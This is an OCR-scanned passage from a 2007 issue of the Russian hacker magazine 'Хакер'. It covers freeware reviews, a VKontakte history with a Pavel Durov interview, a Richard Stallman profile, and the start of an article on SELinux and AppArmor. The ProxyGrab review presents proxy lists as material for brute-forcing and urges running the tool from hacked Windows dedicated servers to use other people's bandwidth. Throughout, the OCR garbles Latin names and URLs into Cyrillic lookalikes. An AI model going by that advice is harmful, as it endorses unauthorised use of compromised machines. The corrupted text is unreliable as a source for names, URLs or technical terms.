нии медиаплеера и прочее. О втором пункте 
меню даже и говорить не буду — тут и так все 
предельно понятно =). А вот под «разнообразны- 
ми дополнительными параметрами» создатель 
проги подразумевал отруб синхронизации 
времени, гетоіе -десктоп а (удаленного рабочего 
стола), запрет всплывающих советов, автомати- 
ческое удаление файла подкачки ит.д. Раздел, 
посвященный Ослику, не отличается оригиналь- 
ностью :). В немты можешь запретить все и вся: 
начиная от использования АсбѵеХ и заканчивая 
всплывающими окнами. Кстати, нечто похожее 
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тебе предлагается провернуть и с М5 Меззепдег, 
заблокировав его старте загрузкой оси =). 
Полагаю, сутьтулзыты понял и благополучно 
разберешься с ней. Запасисьтерпением и фан- 
тазируй, благо софтина предоставляет для этого 
все условия :). 

Р.5.: Тулза полностью фриварная и русифициро- 
ванная, но небольшиетраблы с кодировкой я все 
же наблюдал :]. 

Л ПРОГРАММА: РРОХѴСРАВ 
ОС: ѴІІЧ&0Ѵ5 2000/ХР 
АВТОР: ЗРЬЕЕМЗАСК 




|Парсим халявные прокси-листы| 



Ты, наверное, не раз сталкивался страблами 
при составлении прокси-листа для брута/ска- 
на/еіе. Не скрою, искать большое количество 
про кейков, тем более халявных, — задача 
утомительная, другое дело — платные. Но, 
как говорится, кто ищет — тот найдет. Вот и я 
нашел =). Нет-нет, нежди, что я начну патчить 
тебя халявными акками на какой-либо из 
прокси-сервисов или раздавать прокси-листы 
по паре в руки :). Все гораздо скромнее: я хочу 
представить тебе замечательную тулзу под 
названием РгохуѲгаЬ, которая навсегда изба- 
вит тебя от вышеописанного геморроя. Прога 
предназначена для парсинга в Сети страничек 
с бесплатными проксиками и составления 
удобочитаемого списка с прочеканным со- 
держимым =). Кстати, софтина может работать 
аналогично и с файлами на твоем винте. Меню 
подробно описывать не буду — познакомишься 
сам, а вот о статистике, которую умеет вести 
тулза, пару слов скажу. Чтобы не растекаться 
мыслью по древу, все сокращения расшифро- 
ваны и приведены ниже: 

Зоигсез — источники: 

Т — Тоіаі — общее количество 
С — СИескеб — помеченные 
5 — Зеіесіесі — выделенные 
5сап — сканирование: 

Т5 — ТоіаІЗсаппесІ — всего отсканировано 
Р5 — РогЗсап — осталось источников для 
сканирования 

С5 — Сиггеп1;5саппесІ — отсканировано в 
текущем скане 



» 



Ргохіез — прокси: 

Р— Роипб — найдено 
А — АКоѵѵесІ — принято в список 

Крометого, утила работает в многопоточном 
режиме (количество потоков можно регулиро- 
вать вручную) и умеет пахать через проксик. 
Юзать ее я настоятельно рекомендую с 
поломанных виндовых дедиков, поскольку за- 
бивать свой личный канал не так приятно, как 
чужой (ака буржуйский =)). Программулина, как 
водится, фриварная и нетребует инсталляции, 
поэтому поместить утилу на флешку в раздел 
боевого софта тебе просто необходимо. Одним 
словом, тіізі Ьаѵе, товарищи, гпизі: Иаѵе! 

Л ПРОГРАММА: ІЛЧІѴЕК5АІ. 0АѴА5СРІРТ 

&ЕСО&ЕР 

ОС: 2000/ХР 

АВТОР: НИМСЕК.КІІ 




Проводя очередной вечерза парсингом или 
просматривая работу понравившегося движка, 
все чаще натыкаешься на новые фишки разра- 
ботчиков. Увы, но в последнее время нередко 
встречаются защиты, которые обфусцируют 
Ыт 1-содержимое страницы, и такую пагу 
стандартными средствами прочесть становится 
попросту невозможно. По правде сказать, утил, 
решающих эту проблему, нетак много. Поэтому 
сейчас я познакомлютебя с достойным предста- 
вителем этой серии софта — релизом от ребят 
из Ьіэпаег.ги под названием ІІпіѵегзаЮаѵаЗсгірІ; 
Оесосіег. Тулза является универсальным деко- 
дером и отлично справляется со своей задачей. 
Она умеет работать в трех режимах: 

• Ри Ц НТМІ_— выдается весьобфусцирован- 
ный и проинтерпретированный Ыті-код. 

• ѴѴІіИоиІ; <зсгір1> —тела функций декоде- 
ров обфускатора находятся междутэгами 
<5сгі рі> и </ зегі рі> ; этот режим позволяет 
вырезать все эти участки, оставив только 
проинтерпретированный результат и другой 
Ніті-код. Но помни, что при этом может быть 
вырезан и интересующий тебя скрипт. 



• Опіу Іехі — оста вл я ет только текст. 

Крометого, утила имеетбІЛ-интерфейс и сим- 
патичную менюшку. Работаетбез инсталляции 
и весит всего чуть более 180 Кб. Смело сливай 
ІІпіѵегзаІ ОаѵаЗсгірі Оесосіегс нашего ОѴй и 
юзай в свое удовольствие. 

^ ПРОГРАММА: ЗСАКАВАѴ 
ОС: ѴІІЧ&0Ѵ5 2000/ХР 
АВТОР:ІЧІСК КАІ_МѴКОѴ 




Сколько раз я выкладывал различный крип- 
тософт — не сосчитать :). Но тем не менее я 
буду упорно продолжать это делать. Ничего уж 
тут не поделаешь — я параноик, это извес- 
тный побочный эффект нашей профессии 
=). А потому рад предложить тебе еще одну 
тулзу — ЗсагаЬау. Прога предназначена для 
хранения и шифрования твоих секретных 
данных. Особенно удобно юзать утилу при 
веб-серфинге, так как она сей вит твои логины, 
пароли, номера кредитных карт, пин-коды, 
серийные номера и ключи к программам в 
зашифрованном виде, номера телефонов и 
еще много всего. Отакой фишке, какзапуск 
сохраненного урла, я вообще молчу. Кроме 
того, тулза обладает встроенным генератором 
безопасных случайных паролей (под безопас- 
ными я подразумеваю пассы вида ЫЬ6д*Ю 
=)). Количество хранимых данных и их объем 
не ограничены, поэтомуты наконец-то без 
проблем сможешь провести полную ревизию 
своих данных и навсегда забыть о бумажках 
(вроде тех, на которых на той неделеты запи- 
сал пару рутовых паролей на а мерс кие дедики 
и которые вчера не обнаружил на своем столе, 
потому что заботливая девушка/бабушка/мама 
выкинула их еще два дня назад =)). 

В софтинке удобно реализована поддержка 
различных профилей пользователей с воз- 
можностью создания отдельных аккаунтов. О 
гуишной менюхе и красиво прорисованном сти- 
ле я скромноумолчу, не говоря уже об удобном 
сворачивании в трей :). Ато, что тулза полностью 
бесплатная, — это еще один еежирный плюс. Уф, 
хватит разговоров, срочно ставь прогу и сейви 
все, что наработал за долгие месяцы/годы :1 лг 
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В контакте! 

Социальная сеть XXI века 

Общение в интернете — забава известная. У нас в стране разного рода сети и сервисы 
для разговоров опііпе всегда пользовались бешеной популярностью. Фидо, форумы, аська, 
живой журнал. . . Сегодня самым популярным сайтом для сетевого общения является «В 
Контакте, ру». 




История создания 

Программированием петербуржец Павел Дуров занимается давно. С 
1 1 лет. И, даже несмотря на то что получать высшее образование Павел 
пошел на филологический факультет, ктомуже на кафедру английского 
языка, любимое дело студент Дуров не забросил. Занимался он теперь по 
большей части ѵѵеЬ-строением. Его первым крупным проектом стал сайт 
Ригоѵ.сот . На сайте было организовано хранилище с ответами на экза- 
менационные билеты. Во время сессий Ригоѵ.сот и сегодня становится 
спасательным кругом для многихучащихся вузов. Следующим порталом 
Павла был зрЬди.гіэ . сайт его университета. ЗрЬди.ги является образцом 
хорошего вузовского сайта, но главная гордость Павла — форум ресурса. 
Форум превратился в настоящее студенческое сообщество, где накопи- 
лосьуже полтора миллиона сообщений. Павел думал, как приблизить 
сетевое общение к реальному. В профайле на форуме появились графы 
«Имя», «Фамилия», «Кафедра»... Но юзеры не хотели развиртуализиро- 
ваться. Наверно, в этом есть своя романтика, когда по паспортуты Вася 
Пупкин, а согласно никнейму, ѴАвіІіиз-зех-ппасЫпе. Форумы решительно 
не соответствовали концепции Павла. 



В начале 2006 года из Америки вернулся друг Дурова, который расска- 
зал ему, что в Штатах уже существуют сайты, являющиеся онлайновыми 
студенческими сообществами. Так Павел узнал о ІасеЬоок.сот . где 
пользователи вместо никнеймовуказывали реальные имена и фамилии, а 
при авторизации прописывался емейл-адрес, а не логин. 

Дуров увидел то, что хотел реализовать в России. Им была собрана 
база по вузам и факультетам Российской Федерации — использова- 
лись как различные справочники, так и поисковики. Летом, после на- 
писания движка сайта, была запущена альфа-версия. Были зарегис- 
трированы первые пользователи: друзья Павла и люди, помогавшие 
ему в программировании ресурса. Отдельное внимание было уделено 
безопасности сайта, движоктщательнотестировался на вероятные 
ошибки. Личная информация юзеров на подобных сайтах должна быть 
сверхзащищенной. Единственный момент, вызвавший в команде 
разработчиков разногласия, касался названия. Придумать нечто ори- 
гинальное не получалось, а названия вроде зШсіепЕги были слишком 
скучными. Все студенты рано или поздно становятся выпускниками. 
Павел полагал, что и тогда им нужно оставаться в контакте. На том и 
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остановились — социальная сеть стала называться «В Контакте». 
Чтобы продолжить повествование, мне нужно рассказать тебе, что пред- 
ставляет собой сайт. 

Краткое руководство пользователя 

Ты регистрируешься на сайте. Указываешь свое имя, фамилию, заполня- 
ешь анкету. Можно указать место, дату рождения, школу, вуз и факультет, 
место работы. Также есть стандартные поля вроде «деятельность», «инте- 
ресы». Все твои данные будут отображаться наличной страничке (в про- 
файле) сайта. Все сведениятакже играют роль гиперссылок. Ты можешь 
посмотреть всех юзеров такого же года рождения, найти сокурсников и 
коллег по работе. В этом и заключается главная фишка сайта — в возмож- 
ности отыскать в сети всех оффлайновых знакомых. Еще есть место для 
размещения аватара и «стена», где тебе будут о ста в л ять комментарии, 
доступные для всеобщего обозрения. 

Теперьосервисах. 

«Мои друзья» — люди, которых ты зафрендил. Принципиальное отличие 
отЖЖвтом, что здесь в друзья добавляюттех, когознаютв реальной 
жизни. Ну и еще иногда мальчики добавляют незнакомых, но красивых 
девочек. Через этотсервисты сможешьбыстро выйти на профайл друга и 
увидеть, кто из френдов сейчас в сети. 

«Мои фотографии» — фотоальбомы. Можно выложить весь семейный 
фотоархив, лично я пока с ограничениями на хранение не столкнулся. 
«Мои видеозаписи» — локальный Ютуб. Коллекция видеороликов юзера. 
Существует возможность обмениваться личными сообщениями, ничем 
принципиально не отличающаяся оттаковой на форумах. Ты можешь 
вести блог: писать заметки, читать записи друзей. До развитых блогов 
вроде Ыѵе^игпаісервису оченьдалеко, но графоманией здесь никто и не 
страдает. 

Успехаже сайтдостигфеноменального. Сегодня «В контакте» на четвер- 
том месте в рунете, впереди только Яндекс, Рамблер и таіі.ги . Количество 
зарегистрированных пользователей близко к цифре 700 000. В чем причи- 
на такой популярности? 

Во-первых, сайт дает возможность поддержки связи с личными 
знакомыми. Подобное уже пытались реализовать осІпокІазБпікі.ги и 
МоіКгид, но «Контакт» несравненно более удобен, и в нем зарегис- 
трировано больше юзеров. А значит, и шансов найти старого друга 
больше. 

Второй фактор — отсутствие рекламы. Дуров говорит, что занимается 
порталом не ради денег. И относится к сайту не как к бизнес-проекту, а 
как к собственному детищу. «Душевные силы и фанатизм не покупают- 
ся за деньги, но они необходимы», — пишет Павел в своем дневнике. 
Все предложения о продаже сайта — а их в последнее время поступало 
немало — отклоняются, ни одного рекламного баннера на сайте так и 
не появилось. 



Группы и встречи 

Традиционно в веб-сообществах создаются тематические группы, 
объединяющие пользователей по интересам. Не стал исключением и «В 
Контакте». Самая популярная группа — «Студенты.ру», включающая 
ббтысяч человек. Ну, это неудивительно для студенческого сайта. Нович- 
кам рекомендую сообщество «Все4уои» — своего рода путеводитель по 
порталу. Здесь подскажут все нужн ые тебе труп п ы ил и даже кон кретн ых л юдей . 
48 тысяч объединились в армию для борьбы с сообщениями типа «Пере- 
дай эту ш ня гу 10 людям, или тебе пипецна следующий день!». Действи- 
тельно, аську уже не включить без этого спама. Есть группа любителей 
анекдотов, коллектив ненавидящих бабокстележками, юноши и девуш- 
ки, изучающие романтические места Санкт-Петербурга. ОтЖЖшных, 
фидошных и остальных эти группы отличает их массовость. Групп, где 
зарегистрировано 20-30тысяч участников, великое множество. 

Здесь, правда, есть одно неудобство. За пару недель «В Конта кте»ты 
будешь зареган в пятнадцати группах, а отслеживать информацию в 
них всех очень сложно. Никакой френдленты для этого нет, и утебя будет 
огромное количество постоянно обновляемых форумов. Надеюсь, в бли- 
жайшее время разработчики разрулят эту неудобную ситуацию. 
Контактеры просто не могут не встречаться в оффлайне, благо есть еще 
и сервис «Встречи». Назначается место и время события и пишется его 
анонс. Это может быть просто флешмоб, а может и какая-нибудь эротичес- 
кая вечеринка. 

Из предстоящих встреч отмечу «Самую большую бухаловку в мире». По- 
пить водки-пива в центре города собираются бтысяч петербуржцев. Если 
все, кто обещал, появятся, можно проситься в книгу рекордов Гиннеса. 
Для непьющих проводился «Русский день всех влюбленных». Парочки 
из «Контакта» придумали свой праздник вместо Дня святого Валентина 
и устроили массовый поцелуй на улицах. Рыжие контактеры отметились 
рыжим же маршем. Взяли и пробежались по городу, что еще в выходной 
делать? Крашеных рыжих, кстати, тоже брали. 

Но чаще встречи оказываются приглашением на мероприятия вроде 
концертов, фестивалей, массовых гуляний. Таксказать, афиша под рукой. 
Ничего не пропустишь. 

Интервью с Дуровым 

Прерываю свой рассказ, чтобыты все узнал из первыхуст. Встречай 
— Павел Дуров, создатель «В Конта кте.ру». 

И.А.: Здравствуй, Павел! Расскажи, когда ты стал интересоваться ком- 
пьютерами, технологиями? Какой утебя был первый компьютер и чтоты 
на нем делал? 

П.Д.: Первый — ІВМ РС ХТ. На нем в начале 90-х мы на пару с братом 
ваяли несложные игры. Вто время было очень важно бережно относиться 
к ресурсам системы, иначе разработанные программы нещаднотормо- 
зили. Слава богу, бережное отношение к ресурсам у нас осталось. При 
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нагрузках в несколько тысяч просмотров в секунду не спасет даже лучшее 
серверное железо. 

И.А.: Ка кты попал в интернет?Утебя ведь были проекты до «Контакта»? 
П.Д.:В интернете я с 1997 года, с момента, когда в гимназии появился 
компьютерный класс с неограниченным доступом. Тогда больше всего 
времени я проводил на Уабоо, в рунете смотреть еще было не на что. 
Первым моим сайтом был Ригоѵ.сот . который начинался как моя домаш- 
няя страница, а потом реформировался в копилку материалов для всех 
студентов гуманитарных специальностей. Это был изегдепегаіесі сопіепі 
в действии: никаких вторичных материалов, студенты сами готовили 
ответы на экзаменационные вопросы и закачивали на сайт. Кстати, доста- 
точно популярная и по сей день штука. 

Но наиболее крупный мой ресурс до «Контакта» — зрЬаи.ги . Неофициаль- 
ный сайт второго по величине вуза страны был обречен на популярность, 
но удалось также выйти за рамки одного вуза. Сайт резко поднялся в эпоху 
форумных бумов 2002-2003 годов и до сих пор остается самым крупным 
молодежным форумом рунета. Потом, уловив волну ѴѴеЬ 2.0, я стал вводить 
социально значимые функции вроде пользовательских клубов, групп и 
списков друзей. 

К 2006-му стало окончательно ясно, что пора отказываться от старого 
интернета с его смайлами, чатами, никнеймами и аватарами. Тогда я и 
решил сделать что-то принципиально новое. 

И. А; Чем ты занимаешься на сайте сейчас? Какую именно работу 
выполняешь? 

П.Д. .'Сейчас в команде уже несколько программистов, но я по-прежнему 
люблю поковыряться в коде и ввести пару-тройку новых функций. 80% 
нынешнего кода «В Конта кте.ру» — моих рук дело. Также немало времени 
уходит на постановку задач, контроль качества. Общий мониторингфунк- 
ционирования системы тоже остается за мной. 

И.А.:Тъ\ работаешь где-нибудь, кроме «Контакта»? На какие деньги 
существует проект? Неужели создатели не получают вообще никакой 
прибыли? 

П.Д.: Поверь, работы в «Контакте» хватит на целую бригаду. Нигде боль- 
ше работатья не смогбы при всемжелании. Нам повезло, что изначально 
было достаточно своихсредств на финансирование проекта. Когда 
проект вырос и стал заметен, мы без труда привлекли инвестиции для его 
дальнейшего развития. Вообще, как мне кажется, деньги сейчас не самое 
главное в веб-проектах. Вотталантливые специалисты —те в дефиците. 

И чаще всего их не купишь ни за какие деньги. 

И.А.: Ка кое оборудование используется для поддержания работы сайта? 
Где оно расположено физически? 

/7.Д.;Я сторонник Іпіеі, Эирегтісго, Сізсо. Подводят редко. Часть серве- 
ров расположена в Санкт-Петербурге, часть — в Москве. Техническую базу 
постоянно расширяем, так как проект по-прежнему растет очень быстро. 
И.А.: Вылили попытки взлома, ООоЗ-атак? Насколько защищен «В 
Конта кте.ру»? 



П.Д.: Попытки взлома у нас начали осуществляться уже со второго меся- 
ца жизни проекта, ООоВ’ы — стретьего. 

Мы несколько раз проводили внутренний аудит кода, однако не менее 
основательно кэтому вопросу подошли и сотни начинающиххакеров, 
которые настойчиво перебирали всетипы уязвимостей. Серьезныхдыр 
в безопасности так никто и не обнаружил. Что касается личной информа- 
ции, «В Контакте» не более и не менее безопасен, чем любой другой круп- 
ный сайт: еслиу вас достаточно длинный пароль, который вы нетеряете в 
общественных местах, и вы не страдаете оттроянов, то ваша информация 
в безопасности. 

АвотООоЗ’ы потрепали нам намного больше нервов. В январе мы 
отказали бизнесменам, желающим купить проект; они стартовали свои 
проекты-клоны и заказали 00о5. Гнали и 200 Мбит/с, и 1 ,5 Гбит/с. В итоге 
мы разработали многоступенчатую системы защиты, закупили кучу обо- 
рудования и стали держать оборону. Кончилось делотем, что ОВоЗ’еры 
отчаялись. Кстати, конкретной информации о методах борьбы с 00о5 
очень мало, ите немногие крупицы, которые мы нашли, обнаружились на 
страницах журнала «Хакер». Молодцы, что публикуете такие вещи. 
И.А.:Тъ\ сотрудничаешь с Арріе? 

/7.Д.: Сотрудничать с Арріе мы стали достаточно давно, еще в декабре. Я 
тогда придумал, что мы можем подарить ІРоб тем, кто пригласит на сайт 
своих друзей. Конкурс оказался интересным и для нас, и для Арріе. Нотут 
есть нечто большее, чем просто взаимовыгодное сотрудничество. Мне 
приятно думать, что «Контакт» и Арріе объединяет перфекционизм. 

Кстати, забавная деталь: послетех акций многие ресурсы рунета закупили 
Арріе ІРоб и стали проводить точнотакиеже конкурсы, полагая, что в них 
секретуспеха. Компания Арріе в этой истории явно не прогадала. 

И. А.: Есть ли на сайте личности, которых можно назвать культовыми? Так 
сказать, элита портала? 

П.Д.: Насколько я знаю, нет, так как ресурс децентрализован. Едва ли 
можно выделить кого-то, кто в глазах миллиона посетителей является 
элитой. А может быть, я просто чего-то не знаю. 

И.А.: Вспомни какие-нибудь истории из жизни сайта. 

П.Д .: Забавный случай был во время сессии, когда студенты совершенно 
серьезно готовили массовую петицию стем, чтобы я закрыл «Контакт» 
на время их подготовки кэкзаменам. Набралось, кажется, несколько 
десятков тысяч человек, которые утверждал и, что существование сайта 
подрывает их способность какадемическим видам деятельности. 

Вообще, подобных групп уже много. Самой забавной для меня остается 
клуб «Жертвы контакта», где можно встретить жутковатые возгласы 
вроде «Я сумел прожить без сайта почти сутки!». 

И.А.'Зарегистрирован ли на сайте кто-нибудь из знаменитостей? Как 
думаешь бороться с огромным количеством виртуалов? 

П.Д.: Несколько раз видел достаточно известных личностей из музы- 
кальной и эстрадной среды. Думаю, известным людям всегда любопытно 
почитать «стену» своего фан-клуба, а начинающим музыкантам удобно 



► 088 



ХАКЕР 08 /104/ 07 





^ сцена 



привлекать аудиторию через сайт, особенно после введения нашего 
собственного видеохостинга. «Фальшивых»знаменитостей намного 
больше, но раскусить их достаточно просто. Периодически они удаляются 
модераторами. 

И.А.: Какова география ресурса? Откуда большинство пользователей? 
П.Д.: Трэд и ционно рунет — это на 85% Москва и Санкт-Петербург. И мы 
здесь не исключение. За ними следом идут Новосибирск, Екатерин- 
бург, Нижний Новгород. Немало бывших соотечественников из США 
и Западной Европы. В последнее время всеактивней подключаются 
Украина и Казахстан. Но костяк сайта собирается вокруг старейших вузов 
двух столиц — это университеты вроде СПбГУ, МГУ, Бауманки, Политеха, 
МГИМО и многих других. 

И.А.: В чем принципиальное отличие «В Контакте» отаналогов? В чем 
секрет популярности? 

П.Д. .'Возможно, секретвтом, что за несколько лет ведения веб-проектов 
я успел разобраться в потребностях целевой целевую аудитории. Для 
пользователей важно нетолько то, что есть на сайте, но и то, чего на нем 
нет. Поэтому, в отличие от многих других сайтов, мы не превращаем ре- 
сурс в солянку стандартных функций, которые размываютфокус проекта. 
Аналоги в сфере социальных сетей обычнолибо вырождаются в дейтинг, 
либо становятся проектами для гиков ѴѴеЬ 2.0. Причина этого — за штам- 
пованность. Мы каждый раз пытаемся не идти по проторенной дорожке, а 
делать то, чего еще не было. 

В ситуации, когда мы постоянно предлагаем что-то новое для рунета, 
а остальные копируют существующее, нетакуж и сложно оставаться 
лидерами. Главное — понимать психологическую подоплекутех или иных 
функций, а не бросаться реализовыватьто, что есть где-то в других местах 
и к чему, возможно, привыкли пользователи. В каком-то смысле лучше 
устанавливать свои стандарты и правила, чем двигаться в руслеуже 
имеющихся. 

Приведутакой пример. Существует данность: пользователям необ- 
ходимо как-то выражать другдругу симпатию или уважение. На это 
есть спрос, который можно удовлетворять совершенно по-разному. 
Дейтинг-сервис предложит возможность дарить другдругу подарки, 
купленные на какую-нибудь внутреннюю валюту. Гиковый сервис 
предложит очередную систему изменения репутации, разобраться в 
которой сможеттолько кандидат математических наук. Мы же сейчас 
пытаемся сделать нечто новое: на стыке РІазЬ/ЭБ и РНР мы разраба- 
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Павел Дуров. Создатель и 
лидер проекта. Разработчик 
нескольких студенческих 
сайтов, программист. Дипло- 
мированный филолог. Лауреат 
стипендии Президента и 
Правительства РФ, лауреат 
стипендии Владимира Пота- 
нина. Основную часть времени 
отдает порталу «В Контакте.ру». 
Поклонник II N IX и Советского 
энциклопедического словаря. 



ОлегАндреев. Специалист 
по видеоблогингу. Подарил 
юзерам возможность выкла- 
дывать видеоролики. Учится на 
радиофизическом факультете, 
также занимается проведени- 
ем семинаров для разработчи- 
ков софта. 



Николай Дуров. БратПавла, 
один из самых высококлас- 
сных программистов в России. 
Кодингом занимается с семи- 
летнего возраста. Возглавлял 
команду российских про- 
граммистов, которая дважды 
выигрывала международный 
чемпионат по программи- 
рованию — АСМ. Отверг 
предложения МісгозоЛ и 5ІЛМ, 
чтобы заниматься научной де- 
ятельностью и помогать брату 
в его интернет-проектах. «В 
Контакте» является главным 
системным администратором. 



тываем систему, которая позволит пользователям рисовать картины на 
«стенах» друг друга на манер виртуального граффити. На мой взгляд, 
это будет более инновационный и более творческий способ выражения 
отношения другдругу. 

И.А.: Ка ким ты видишь будущее проекта? Будут ли какие-то 
нововведения? 

п.д. .'Сейчас мы на четвертом месте в рунете, но мы только начали. В 
перспективе «В Контакте» станетуниверсальным средством обмена 
информацией. Мы не собираемся ограничиваться какой-то отдельной 
нишей. Работы еще много, но как раз это и интересно. «В Контакте.ру» 
должен стать ресурсом, который изменит отношение среднестатистичес- 
кого русскоязычного пользователя к самой идее интернета. Со време- 
нем интер нет должен стать отражением общества, а не просто набором 
удобныхсервисов. 

И. А.: Спасибо, что согласился ответить на мои вопросы! Можешь что- 
нибудь пожелать читателям «Хакера». 

П.Д. .'Желаю всем, кто еще этого не сделал, найти для себя такой вид 
деятельности, который будет доставлять удовольствие вам и приносить 
пользу остальным. Это решит многие проблемы, т 




Андрей Столбовский. 
Разработчик. Занимается 
технической поддержкой. 
Уверяет, что также трудится 
вице-губернатором города 
Гусь-Хрустальный по вопросам 
реализации внешнихзапросов 
коперационной системе. Но 
у многих этот факт вызывает 
сомнение. 



Также есть администраторы баз данных, консультанты по юзабили- 
ти и еще несколько человек — у сайта сегодня довольно большой 
коллектив разработчиков. Тем удивительнее, что деятельность их 
совсем не коммерческая. 
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МАРИЯ «МІРРІЦЦ» НЕФЕДОВА 

/мігпішзпшоіск.пи/ 




ИГЛ Я: Ричард Мэтью Столлман 

НИК: мт 

ВПЗРНСТ: 

ГПЕСТП П Р □ :+: И Ь Н Н И Я : Кембридж, штат Массачусетс, 

ІЯ 

СЯЙТ: Ьйр 

Б П □ Г = \Ѵ\ѴШ.М,ОЩ/Ыо^5/ ГШ5 

Биография 

Ричард Столлман родился 16 марта 1953 года в Нью- 
Йорке. Там же он вырос и окончил среднюю школу. 

В возрасте 18 лет Ричард нанялся на работу в научный 
центр ІВМ в Нью-Йорке и провел все лето после оконча- 
ния школы, работая над своей первой программой — пре- 
процессором для языка РІ_/І. 

Параллельно с этим он был лаборантом-волонтером 
на кафедре биологии при университете Рокфеллера. 



Массачусетском технологическом институте (МІТ). Он быстро 
стал завсегдатаем хакерской тусовки МІТ, где был известен 
под ником РМ5. В первой редакции «Словаря хакера», в 
написании которого наш герой принял самое непосредс- 
твенное участие, он заметил: «Ричард Столлман — это лишь 
мое мирское имя, а вы можете называть меня РМ5». 

И тогда же Столлман заговорил о том, что «софт должен 
быть свободным». Эта фраза практически стала своего 
рода девизом его жизни (хотя сам Ричард это усиленно 
отрицал). Он высказывался в адрес распространителей 
ПО крайне осуждающе, называя их действия в отноше- 
нии продаж софта «неэтичными» и «антисоциальными». 
Согласно его убеждениям, свобода — жизненная необхо- 
димость для пользователей и всего общества, это мораль- 
ная ценность, и дело не только в прагматизме. Хотя с 
прагматической точки зрения все просто — свободное ПО 
должно сделать софт лучше. 




«...Когда я увидел перед собой перспективу жизни, прожитой так же, 
как живут все, я решил: ни за что, это отвратительно, мне будет стыдно 
за самого себя. Если бы я поддерживал эту систему отчужденного, собс- 
твеннического программирования, мне бы казалось, что я делаю мир хуже 
ради денег» 



Профессор, с которым работал Столлман, предрекал ему 
большое будущее в качестве биолога, несмотря на то что 
сам Ричард уже решил строить карьеру в области физики 
и математики. 

В 1971 году Столлман поступил в Гарвард и устро- 
ился в лабораторию искусственного интеллекта при 



В 1974 году Столлман с отличием окончил Гарвард 
и стал бакалавром в области физики. Теперь он 
фигурировал в МІТ как дипломированный специа- 
лист. Не желая на этом останавливаться, он добился 
должности программиста в лаборатории искусствен- 
ного интеллекта. В 1 977 году он представил на суд 
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общественности свою программу — систему безопасности на 
основе ИИ. 

В 1984 году Столлман уволился из МІТ и с головой ушел в свой 
проект Ѳ N И , который анонсировал еще в 1983-м, опубликовав о 
нем объявление на пеРипіх-ѵѵігагсІз и пеРизоіІ. С этой отметки для 
Ричарда началось «больше плавание» и борьба за свободу ПО. 

Проекты 

Название проекта Ѳ N ІЛ — это рекурсивная аббревиатура « Ѳ N ЦІ ’з N 01 
Ц) N IX» («Ѳ N Ц) — это не 10 N IX») . Проект с самого начала был ориенти- 
рован на создание и развитие ІІпіх-подобной ореп воигсе ОСи. Стоит 



патентов и авторских прав. Официальный символ организации — ста- 
туя свободы, держащая в руках Сй и катушечную кассету, вместо при- 
вычных факела и таблички. 

В 1985 году Столлман ввел в обиход термин соруіеіі (игра слов 
от соругідЫ — «авторские права»), который идеально отображает 
концепцию и цели движения за свободное ПО. Немного позже на 
основе этой идеи была создана и юридически зарегистрирована 
Стандартная общественная лицензия 6КЮ (6КЮ Оепегаі РиЫіс 
Ысепзе), предполагающая бесплатное и беспрепятственное рас- 
пространение ПО. Первая программа вышла под этой лицензией 
в 1 989 году. 



«Несвободные программы — это хищная социальная система, господствующая над людьми, 
разобщающая их и использующая полученную прибыль для достижения еще большего гос- 
подства. Может показаться выгодным положение одного из вассалов этой империи, но единс 
твенный этичный выбор — это сопротивление системе вплоть до полной ее ликвидации» 



заметить, что из МІТ Столлман уволился не только чтобы полностью 
посвятить себя новому детищу, но и потому что опасался, что универ- 
ситет предъявит какие-то права на код 6ЫІІ. Бессменным логотипом 
ѲКІІІ является морда одноименной антилопы. 

Первой программой под ѲЫІІ стал текстовый редактор Егласв, создан- 
ный самим Столлманом, за ним последовали и другие. Во многом на 
основе ѲКІІІ был написан и Ыпих. Сам же Столлман настаивает, что 
детище Торвальдса должно называться СКІІІ/ипих и никак иначе. 

С терминологией у него давние счеты, но об этом речь пойдет чуть 
ниже. 

Во всем мире Ричард Столлман известен не только как програм- 
мист и разработчик ПО, но и как ярый активист. Запустив про- 
ект ОІМІІ, Столлман дал старт движению за свободное ПО, цели 
которого вполне понятны из названия. В его поддержку была 
учреждена некоммерческая организация Ргее ЗоіТѵѵаге Роипсіаііоп 
(Р5Р). Первичной ее задачей был поиск и наем программистов, но 
где-то в середине 90-х нужда в этом отпала, и в наши дни Фонд 
больше занимается юридическими и организационными вопро- 
сами. Например, ежегодная премия за продвижение свободного 
ПО — Ргее ЗоіТѵѵаге АѵѵагсІ — учреждена именно Р5Р, и Столлман 
— постоянный член жюри. 

Среди других его общественных заслуг — основание в 1 989 году Лиги 
за свободу программирования. Эта организация призвана объединить 
разработчиков свободного и проприетарного ПО в борьбе против 



В вопросах терминологии Столлман весьма педантичен. Он согла- 
шается давать интервью только при условии, что в публикации 
будут использоваться только верные с его точки зрения терми- 
ны. Например, он уже давно борется со смешением понятий бгее 
зоЛѵѵаге (свободный софт) и ореп зогсе (ПО с открытым кодом). 
Столлман настаивает на том, что это абсолютно разные вещи и 
путать их никак нельзя. Ведь термин ореп зоигсе, по сути, скрывает, 
что истинная цель такого ПО — свобода. 

Хобби и личная жизнь 

В настоящее время Ричард Столлман официально проживает 
в Кембридже, но своего дома у него нет. Он колесит по свету 
с лекциями, посещает всевозможные конференции, форумы, 
церемонии награждения и ведет образ жизни странствующего 
евангелиста и философа. Интересно, что чаще всего Столлману 
за труды не платят. 

Он не женат, на вопрос о детях, отвечает, что его единственный ребе- 
нок — это движение за свободное ПО. 

Столлман — большой поклонник научной фантастики, в частности Грега 
Игана. Перу Ричарда принадлежат два небольших научно-фантасти- 
ческих рассказа. 

В плане музыки он почти всеяден, но чаще предпочитает фолк. 

Кроме английского языка, неплохо владеет французским и 
испанским. =Н= 
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Что имеем? 

В процессе работы любого приложения могут возни- 
кать различные отклонения, приводящие в итоге к его 
аномальному выполнению. Это могут быть как систем- 
ные сбои, ошибки в программировании, так и искус- 
ственно вызванные ситуации. И последнее далеко не 
редкость. Хакер, обнаружив, что при определенных 
условиях можно повлиять на выполнение программы, 
естественно, попытается этим воспользоваться. 
Предсказать поведение программы во внештатном 
режиме практически нереально. Примером тому 
являются антивирусы, которые все время работают в 
«догоняющем» ритме, не обеспечивая защиту от 0-бау 
атак. А вот нормальное поведение программы можно 
описать с помощью относительно простых правил. В 
результате появилось несколько проектов, реализующих 
концепциюупреждающей защиты. Среди них ІЭР5 Ьллллл/. 
ІісІБ.огд ). бРЗесигБу ( ѵѵѵѵѵѵ.дгзесигііѵ.огд ). АррАгтог 
[ богде. поѵеіі.сот/ тосіи Іез/хбт осі/р го] есі/?а р ра гтог ] и 
ЗЕЫпих ( ѵѵѵѵѵѵ.пза.доѵ/зеііпих ). Но большей известнос- 
тью пользуются последние два. 

